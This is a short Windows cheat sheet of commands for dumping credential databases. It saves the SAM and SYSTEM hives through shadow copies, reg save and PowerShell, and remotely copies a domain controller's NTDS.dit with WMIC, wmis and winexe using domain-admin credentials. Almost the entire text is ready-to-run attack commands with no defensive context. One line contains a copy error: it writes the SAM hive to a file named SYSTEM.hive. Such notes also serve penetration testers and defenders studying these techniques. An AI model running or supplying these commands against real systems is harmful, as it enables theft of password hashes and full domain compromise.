Useful Commands - Windows

Save SAM database

Get SAM via cmd.exe:

vssadmin create shadow /for=c:
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<#_from_list_shadows>\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<#_from_list_shadows>\windows\system32\config\SAM .

Get SAM via registry:

 reg save hklm\sam SAM
reg save hklm\system SYSTEM

Get SAM via Powershell:

$service=(Get-Service -name VSS) if($service.Status -ne "Running"){$notrunning=1;$service.Start()} $id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID $volume=(gwmi win32_shadowcopy -filter "ID='$id'") `cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM"\` $volume.Delete();if($notrunning -eq 1){$service.Stop()}

Via WMIC (remote):

C:\> net use \\DC1 /user:DOMAIN\domain_admin domainadminpassword
C:\> dir \\DC1\C$
C:\> wmic /node:DC1 /user:DOMAIN\domain_admin /password:domainadminpassword process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\vssadmin.txt"
C:\> type vssadmin.txt
C:\> wmic /node:DC1 /user:DOMAIN\domain_admin /password:domainadminpassword process call create "cmd /c vssadmin list shadows 2>&1 > C:\temp\vssadmin.txt"
C:\> type vssadmin.txt
C:\> wmic /node:DC1 /user:DOMAIN\domain_admin /password:domainadminpassword process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1 > C:\temp\system.txt"
C:\> type system.txt
C:\> wmic /node:DC1 /user:DOMAIN\domain_admin /password:domainadminpassword process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SYSTEM.hive 2>&1 > C:\temp\sam.txt"
C:\> type sam.txt
Save NTDS.DIT database

For NTDS.DIT:

C:\> wmic /node:DC1 /user:DOMAIN\domain_admin /password:domainadminpassword process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt"

Remotely get NTDS.DIT via Kali:

apt-get install libgnutls26 wmis -y
wmis -U DOMAIN\domain_admin%domainadminpassword //DC1 cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt
wmis -U DOMAIN\domain_admin%domainadminpassword //DC1 cmd.exe /c type C:\temp\output.txt

Use winexe to execute a command on Windows remotely

winexe -U "username%password" //10.10.10.10 'wmic bios get serialnumber'